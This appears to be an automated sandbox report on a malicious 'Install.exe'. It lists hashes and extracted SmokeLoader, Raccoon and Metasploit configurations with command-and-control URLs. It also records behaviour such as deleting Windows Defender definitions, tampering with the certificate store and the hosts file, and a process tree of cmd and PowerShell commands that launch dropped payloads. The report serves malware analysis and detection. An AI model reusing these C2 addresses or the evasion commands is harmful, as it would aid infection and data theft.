Overview
overview
10Static
static
ﱞﱞﱞ�...ﱞﱞ
windows10_x64
10ﱞﱞﱞ�...ฺฺ
windows10_x64
10ﱞﱞﱞ�...ﱞﱞ
windows10_x64
9ﱞﱞﱞ�...ﱞﱞ
windows10_x64
10ﱞﱞﱞ�...ﱞﱞ
windows7_x64
win102
windows10_x64
10win104
windows10_x64
win105
windows10_x64
win106
windows10_x64
10win103
windows10_x64
10win101
windows10_x64
10win100
windows10_x64
9Resubmissions
24-04-2021 06:39
210424-lmjja25q22 1023-04-2021 19:10
210423-f6mvfx4yyx 1023-04-2021 19:10
210423-3qnl3etjca 1023-04-2021 18:20
210423-4keqsccdba 1023-04-2021 13:38
210423-1f2d5v8a2s 1023-04-2021 04:53
210423-eenyvz5kqj 1023-04-2021 04:53
210423-svr8rrwggs 1023-04-2021 04:53
210423-95h13plc2x 1022-04-2021 19:11
210422-6s1zd291s6 1022-04-2021 19:05
210422-dsvj9bzkvn 10Analysis
-
max time kernel
196s -
max time network
204s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
23-04-2021 13:38
Static task
static1
Behavioral task
behavioral1
Sample
Install.exe
Resource
win10v20210408
Behavioral task
behavioral2
Sample
Install.exe
Resource
win10v20210410
Behavioral task
behavioral3
Sample
Install.exe
Resource
win10v20210410
Behavioral task
behavioral4
Sample
Install.exe
Resource
win10v20210408
Behavioral task
behavioral5
Sample
Install.exe
Resource
win7v20210410
Behavioral task
behavioral6
Sample
Install.exe
Resource
win10v20210408
Behavioral task
behavioral7
Sample
Install.exe
Resource
win10v20210410
Behavioral task
behavioral8
Sample
Install.exe
Resource
win10v20210408
Behavioral task
behavioral9
Sample
Install.exe
Resource
win10v20210410
Behavioral task
behavioral10
Sample
Install.exe
Resource
win10v20210410
Behavioral task
behavioral11
Sample
Install.exe
Resource
win10v20210408
Behavioral task
behavioral12
Sample
Install.exe
Resource
win10v20210410
Errors
General
-
Target
Install.exe
-
Size
497KB
-
MD5
41a5f4fd1ea7cac4aa94a87aebccfef0
-
SHA1
0d0abf079413a4c773754bf4fda338dc5b9a8ddc
-
SHA256
97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9
-
SHA512
5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f
Malware Config
Extracted
smokeloader
2020
http://999080321newfolder1002002131-service1002.space/
http://999080321newfolder1002002231-service1002.space/
http://999080321newfolder3100231-service1002.space/
http://999080321newfolder1002002431-service1002.space/
http://999080321newfolder1002002531-service1002.space/
http://999080321newfolder33417-012425999080321.space/
http://999080321test125831-service10020125999080321.space/
http://999080321test136831-service10020125999080321.space/
http://999080321test147831-service10020125999080321.space/
http://999080321test146831-service10020125999080321.space/
http://999080321test134831-service10020125999080321.space/
http://999080321est213531-service1002012425999080321.ru/
http://999080321yes1t3481-service10020125999080321.ru/
http://999080321test13561-service10020125999080321.su/
http://999080321test14781-service10020125999080321.info/
http://999080321test13461-service10020125999080321.net/
http://999080321test15671-service10020125999080321.tech/
http://999080321test12671-service10020125999080321.online/
http://999080321utest1341-service10020125999080321.ru/
http://999080321uest71-service100201dom25999080321.ru/
http://999080321test61-service10020125999080321.website/
http://999080321test51-service10020125999080321.xyz/
http://999080321test41-service100201pro25999080321.ru/
http://999080321yest31-service100201rus25999080321.ru/
http://999080321rest21-service10020125999080321.eu/
http://999080321test11-service10020125999080321.press/
http://999080321newfolder4561-service10020125999080321.ru/
http://999080321rustest213-service10020125999080321.ru/
http://999080321test281-service10020125999080321.ru/
http://999080321test261-service10020125999080321.space/
http://999080321yomtest251-service10020125999080321.ru/
http://999080321yirtest231-service10020125999080321.ru/
http://al-commandoz.com/upload/
http://antalya-belek.com/upload/
http://luxurysv.com/upload/
http://massagespijkenisse.com/upload/
http://rexgorellhondaevent.com/upload/
Extracted
metasploit
windows/single_exec
Extracted
raccoon
16992cd33145ccbb6feeacb4e84400a56448fa14
-
url4cnc
https://telete.in/baudemars
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
pid Process 2628 mpcmdrun.exe -
Glupteba Payload 3 IoCs
resource yara_rule behavioral5/memory/3184-175-0x00000000047B0000-0x00000000050BA000-memory.dmp family_glupteba behavioral5/memory/3184-176-0x0000000000400000-0x00000000041D7000-memory.dmp family_glupteba behavioral5/memory/3232-188-0x0000000000400000-0x00000000041D7000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts Ultra.exe -
Executes dropped EXE 8 IoCs
pid Process 1792 Install.tmp 820 Ultra.exe 568 ultramediaburner.exe 972 ultramediaburner.tmp 1484 UltraMediaBurner.exe 1816 Dofifimaefae.exe 1624 Rokaetaroke.exe 2636 instEU.exe -
Loads dropped DLL 12 IoCs
pid Process 1688 Install.exe 1792 Install.tmp 1792 Install.tmp 1792 Install.tmp 1792 Install.tmp 568 ultramediaburner.exe 972 ultramediaburner.tmp 972 ultramediaburner.tmp 972 ultramediaburner.tmp 972 ultramediaburner.tmp 972 ultramediaburner.tmp 972 ultramediaburner.tmp -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 788 icacls.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\UltraMediaBurner\\Qusezhucecu.exe\"" Ultra.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 151 api.2ip.ua 152 api.2ip.ua 159 api.2ip.ua -
Drops file in Program Files directory 9 IoCs
description ioc Process File created C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File created C:\Program Files (x86)\UltraMediaBurner\is-U40VS.tmp ultramediaburner.tmp File created C:\Program Files (x86)\UltraMediaBurner\is-C21T0.tmp ultramediaburner.tmp File created C:\Program Files (x86)\UltraMediaBurner\Qusezhucecu.exe Ultra.exe File created C:\Program Files\DVD Maker\CHNQUSNMYU\ultramediaburner.exe Ultra.exe File created C:\Program Files\DVD Maker\CHNQUSNMYU\ultramediaburner.exe.config Ultra.exe File opened for modification C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe ultramediaburner.tmp File opened for modification C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File created C:\Program Files (x86)\UltraMediaBurner\Qusezhucecu.exe.config Ultra.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
NSIS installer 2 IoCs
resource yara_rule behavioral5/files/0x0003000000013189-149.dat nsis_installer_2 behavioral5/files/0x0003000000013189-151.dat nsis_installer_2 -
Download via BitsAdmin 1 TTPs 1 IoCs
pid Process 1560 bitsadmin.exe -
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{D25514F1-A439-11EB-B85A-F2B989C9245F} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Rokaetaroke.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Rokaetaroke.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Rokaetaroke.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2636 instEU.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 972 ultramediaburner.tmp 972 ultramediaburner.tmp 1624 Rokaetaroke.exe 1624 Rokaetaroke.exe 1624 Rokaetaroke.exe 1624 Rokaetaroke.exe 1624 Rokaetaroke.exe 1624 Rokaetaroke.exe 1624 Rokaetaroke.exe 1624 Rokaetaroke.exe 1624 Rokaetaroke.exe 1624 Rokaetaroke.exe 1624 Rokaetaroke.exe 1624 Rokaetaroke.exe 1624 Rokaetaroke.exe 1624 Rokaetaroke.exe 1624 Rokaetaroke.exe 1624 Rokaetaroke.exe 1624 Rokaetaroke.exe 1624 Rokaetaroke.exe 1624 Rokaetaroke.exe 1624 Rokaetaroke.exe 1624 Rokaetaroke.exe 1624 Rokaetaroke.exe 1624 Rokaetaroke.exe 1624 Rokaetaroke.exe 1624 Rokaetaroke.exe 1624 Rokaetaroke.exe 1624 Rokaetaroke.exe 1624 Rokaetaroke.exe 1624 Rokaetaroke.exe 1624 Rokaetaroke.exe 1624 Rokaetaroke.exe 1624 Rokaetaroke.exe 1624 Rokaetaroke.exe 1624 Rokaetaroke.exe 1624 Rokaetaroke.exe 1624 Rokaetaroke.exe 1624 Rokaetaroke.exe 1624 Rokaetaroke.exe 1624 Rokaetaroke.exe 1624 Rokaetaroke.exe 1624 Rokaetaroke.exe 1624 Rokaetaroke.exe 1624 Rokaetaroke.exe 1624 Rokaetaroke.exe 1624 Rokaetaroke.exe 1624 Rokaetaroke.exe 1624 Rokaetaroke.exe 1624 Rokaetaroke.exe 1624 Rokaetaroke.exe 1624 Rokaetaroke.exe 1624 Rokaetaroke.exe 1624 Rokaetaroke.exe 1624 Rokaetaroke.exe 1624 Rokaetaroke.exe 1624 Rokaetaroke.exe 1624 Rokaetaroke.exe 1624 Rokaetaroke.exe 1624 Rokaetaroke.exe 1624 Rokaetaroke.exe 1624 Rokaetaroke.exe 1624 Rokaetaroke.exe 1624 Rokaetaroke.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1624 Rokaetaroke.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 972 ultramediaburner.tmp 360 iexplore.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 360 iexplore.exe 360 iexplore.exe 1648 IEXPLORE.EXE 1648 IEXPLORE.EXE 1648 IEXPLORE.EXE 1648 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 55 IoCs
description pid Process procid_target PID 1688 wrote to memory of 1792 1688 Install.exe 26 PID 1688 wrote to memory of 1792 1688 Install.exe 26 PID 1688 wrote to memory of 1792 1688 Install.exe 26 PID 1688 wrote to memory of 1792 1688 Install.exe 26 PID 1688 wrote to memory of 1792 1688 Install.exe 26 PID 1688 wrote to memory of 1792 1688 Install.exe 26 PID 1688 wrote to memory of 1792 1688 Install.exe 26 PID 1792 wrote to memory of 820 1792 Install.tmp 32 PID 1792 wrote to memory of 820 1792 Install.tmp 32 PID 1792 wrote to memory of 820 1792 Install.tmp 32 PID 1792 wrote to memory of 820 1792 Install.tmp 32 PID 820 wrote to memory of 568 820 Ultra.exe 33 PID 820 wrote to memory of 568 820 Ultra.exe 33 PID 820 wrote to memory of 568 820 Ultra.exe 33 PID 820 wrote to memory of 568 820 Ultra.exe 33 PID 820 wrote to memory of 568 820 Ultra.exe 33 PID 820 wrote to memory of 568 820 Ultra.exe 33 PID 820 wrote to memory of 568 820 Ultra.exe 33 PID 568 wrote to memory of 972 568 ultramediaburner.exe 34 PID 568 wrote to memory of 972 568 ultramediaburner.exe 34 PID 568 wrote to memory of 972 568 ultramediaburner.exe 34 PID 568 wrote to memory of 972 568 ultramediaburner.exe 34 PID 568 wrote to memory of 972 568 ultramediaburner.exe 34 PID 568 wrote to memory of 972 568 ultramediaburner.exe 34 PID 568 wrote to memory of 972 568 ultramediaburner.exe 34 PID 972 wrote to memory of 1484 972 ultramediaburner.tmp 35 PID 972 wrote to memory of 1484 972 ultramediaburner.tmp 35 PID 972 wrote to memory of 1484 972 ultramediaburner.tmp 35 PID 972 wrote to memory of 1484 972 ultramediaburner.tmp 35 PID 820 wrote to memory of 1816 820 Ultra.exe 36 PID 820 wrote to memory of 1816 820 Ultra.exe 36 PID 820 wrote to memory of 1816 820 Ultra.exe 36 PID 820 wrote to memory of 1624 820 Ultra.exe 38 PID 820 wrote to memory of 1624 820 Ultra.exe 38 PID 820 wrote to memory of 1624 820 Ultra.exe 38 PID 1816 wrote to memory of 360 1816 Dofifimaefae.exe 39 PID 1816 wrote to memory of 360 1816 Dofifimaefae.exe 39 PID 1816 wrote to memory of 360 1816 Dofifimaefae.exe 39 PID 360 wrote to memory of 1648 360 iexplore.exe 40 PID 360 wrote to memory of 1648 360 iexplore.exe 40 PID 360 wrote to memory of 1648 360 iexplore.exe 40 PID 360 wrote to memory of 1648 360 iexplore.exe 40 PID 1624 wrote to memory of 2540 1624 Rokaetaroke.exe 43 PID 1624 wrote to memory of 2540 1624 Rokaetaroke.exe 43 PID 1624 wrote to memory of 2540 1624 Rokaetaroke.exe 43 PID 2540 wrote to memory of 2636 2540 cmd.exe 45 PID 2540 wrote to memory of 2636 2540 cmd.exe 45 PID 2540 wrote to memory of 2636 2540 cmd.exe 45 PID 2540 wrote to memory of 2636 2540 cmd.exe 45 PID 1624 wrote to memory of 2696 1624 Rokaetaroke.exe 46 PID 1624 wrote to memory of 2696 1624 Rokaetaroke.exe 46 PID 1624 wrote to memory of 2696 1624 Rokaetaroke.exe 46 PID 1624 wrote to memory of 3216 1624 Rokaetaroke.exe 74 PID 1624 wrote to memory of 3216 1624 Rokaetaroke.exe 74 PID 1624 wrote to memory of 3216 1624 Rokaetaroke.exe 74
Processes
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1688 -
C:\Users\Admin\AppData\Local\Temp\is-D8RK2.tmp\Install.tmp"C:\Users\Admin\AppData\Local\Temp\is-D8RK2.tmp\Install.tmp" /SL5="$3011A,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1792 -
C:\Users\Admin\AppData\Local\Temp\is-QP9FG.tmp\Ultra.exe"C:\Users\Admin\AppData\Local\Temp\is-QP9FG.tmp\Ultra.exe" /S /UID=burnerch13⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:820 -
C:\Program Files\DVD Maker\CHNQUSNMYU\ultramediaburner.exe"C:\Program Files\DVD Maker\CHNQUSNMYU\ultramediaburner.exe" /VERYSILENT4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:568 -
C:\Users\Admin\AppData\Local\Temp\is-AM5T3.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-AM5T3.tmp\ultramediaburner.tmp" /SL5="$70016,281924,62464,C:\Program Files\DVD Maker\CHNQUSNMYU\ultramediaburner.exe" /VERYSILENT5⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:972 -
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu6⤵
- Executes dropped EXE
PID:1484
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ab-7d17c-257-352b3-bd806c99a2a17\Dofifimaefae.exe"C:\Users\Admin\AppData\Local\Temp\ab-7d17c-257-352b3-bd806c99a2a17\Dofifimaefae.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1816 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e65⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:360 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:360 CREDAT:275457 /prefetch:26⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1648
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\02-2ee1a-fca-26093-78cece45b895a\Rokaetaroke.exe"C:\Users\Admin\AppData\Local\Temp\02-2ee1a-fca-26093-78cece45b895a\Rokaetaroke.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1624 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3ie1enfa.4qn\instEU.exe & exit5⤵
- Suspicious use of WriteProcessMemory
PID:2540 -
C:\Users\Admin\AppData\Local\Temp\3ie1enfa.4qn\instEU.exeC:\Users\Admin\AppData\Local\Temp\3ie1enfa.4qn\instEU.exe6⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2636
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\inubn2s1.lzf\gpooe.exe & exit5⤵PID:2696
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\23e2ohlm.nz1\google-game.exe & exit5⤵PID:3216
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\54qsjadf.srd\md1_1eaf.exe & exit5⤵PID:3872
-
C:\Users\Admin\AppData\Local\Temp\54qsjadf.srd\md1_1eaf.exeC:\Users\Admin\AppData\Local\Temp\54qsjadf.srd\md1_1eaf.exe6⤵PID:3936
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cckzynyl.hpp\toolspab1.exe & exit5⤵PID:2752
-
C:\Users\Admin\AppData\Local\Temp\cckzynyl.hpp\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\cckzynyl.hpp\toolspab1.exe6⤵PID:3236
-
C:\Users\Admin\AppData\Local\Temp\cckzynyl.hpp\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\cckzynyl.hpp\toolspab1.exe7⤵PID:3848
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0nzu4zbm.4d4\SunLabsPlayer.exe /S & exit5⤵PID:2708
-
C:\Users\Admin\AppData\Local\Temp\0nzu4zbm.4d4\SunLabsPlayer.exeC:\Users\Admin\AppData\Local\Temp\0nzu4zbm.4d4\SunLabsPlayer.exe /S6⤵PID:2324
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiFE00.tmp\tempfile.ps1"7⤵PID:3408
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiFE00.tmp\tempfile.ps1"7⤵PID:2644
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiFE00.tmp\tempfile.ps1"7⤵PID:3888
-
-
